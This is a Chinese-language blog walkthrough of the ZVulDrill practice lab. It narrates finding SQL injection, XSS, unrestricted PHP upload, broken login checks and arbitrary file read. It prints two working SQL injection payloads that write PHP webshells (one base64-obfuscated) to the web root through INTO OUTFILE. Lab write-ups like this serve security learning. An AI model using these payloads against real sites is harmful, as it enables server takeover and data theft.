ZVulDrill靶场wp

2019年10月19日 0 作者 y1nhui

0x001 前言

ZVulDrill是一个比较老的靶场了,我现在使用的是17年由redBu1二次开发的靶场

这也是我第一次写靶场总结,希望能写一个不错的测试思路

0x002 开始


可以看到界面有很多功能点、注册、登录、留言、搜索等(都可以有洞
先看一手搜索
搜索qwq后直接url可见,增加单引号后报错,再加上 –+后正常。好的,存在sql注入。order by到了5,报错。,先select 1,2,3,4 看看位置。
嗯,大概明白了
库名
接下来就是爆表名了。

那。。。写一手马看看?

ps:需要mysql已经配置了secure_file_priv= ,若是在mysql.ini内无该项,则无法成功写入

通过之前的报错已经知道路径了,先写一个phpinfo看看报错了,不过有可能写上了,我看看。

成功,接下来就是写马了。

1' union select 1,'<?php @eval($_GET['pass']);?>',3,4 into outfile 'F:/phpstudy/PHPTutorial/WWW/hack.php' --+


哦豁,没写进去,那就写个绕过

1' union select 1,'<?php eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw));?> ',3,4 into outfile 'F:/phpstudy/PHPTutorial/WWW/shell.php' --+


看上去成功了,蚁剑连一手


成功了。
接着来注册页,可能存在sql漏洞,但是现在应该一个账号都没有,先注册一个正常的看看。


先去看看留言处有没有xss
结果留言后留言板不知道在哪。。。。我找找
硬是没找到。。。干脆直接写个xss看看= =
然后搜索一下

虽然没能找到,但是我有个想法,搜索的内容在页面上会有显示,弹一下看看?

真的。。。。我傻了

接着看一下用户编辑ueGZRO.png
我总觉得这里我把用户名一改,就能篡改其他用户的密码。。。。。

还是先试试文件上传吧,用户名这个一会创建第二个账户试。

。。。。。php直接上传。
umyGjA.png
通过复制图片地址来到头像处
umyrcj.png
好的,我们可以看看能不能连上了
um6FVP.png
完事了

然后让我们创建一个admin账户。
创建完后,先登录one账户
在编辑里,更改我们的账户名,同时将密码改为0123456
uDD37j.png
更新。
接着让我们尝试用0123456登录admin账户,登录成功但是头像为一个错误头像,似乎仍登录到了one账户,但admin账户消失。
。。。。
不,测试了一下,似乎是根本没有密码检验,无论我输入什么密码,都能成功登录。。。
uDrTLF.png
我们来challenge看看,还有几个漏洞链接。结果经过测试发现一个跳到了github,一个去了xss-challenges,两个跳向了已经没了的乌云。。。
uDsrf1.png
看一下about,我们可以看到url有一个连接。
试一试更改url
uDsIfI.png
成功读取shell.php的文件。
uDykBF.png
又输入了百度的域名,看报错可以确定,是任意文件读取√
那么到此结束了。

0x002结语

其实这个靶场很简单,甚至连burp都没开。。。漏洞十分基础,似乎也没什么需要总结的,或许可以拿去给新手玩玩。